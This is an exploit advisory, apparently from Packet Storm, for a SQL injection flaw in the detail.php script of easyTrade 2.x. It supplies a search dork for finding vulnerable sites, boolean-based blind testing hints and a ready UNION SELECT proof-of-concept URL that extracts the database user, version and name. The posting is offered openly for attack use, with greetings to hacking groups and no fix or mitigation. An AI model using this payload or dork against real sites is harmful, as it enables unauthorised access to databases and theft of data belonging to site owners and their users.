easyTrade version 2.x suffers from a SQL injection vulnerability in detail.php.
272a6f4032bc4dc5afc7e2263d54f69d801d79703cadb29f78159253635befad######################
#
#easyTrade v2.x SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "powered by easytrade"
#
##
###
##
#
#Script suffers from a not correctly verified detail id variable which is used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#We dont get any SQL Errors when the Injection Query appear to be false.
#However we have to look for content changing when we inject.
#Look at AND 1=1/AND 1=0
#
#SQL Injection:
#http://[target]/[path]/detail.php?id=[SQL]
#
#PoC:
#detail.php?id=-1%20union%20select%20USER(),2,3,4,5,@@VERSION,7,8,9,10,11,12,13,database(),15,16
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed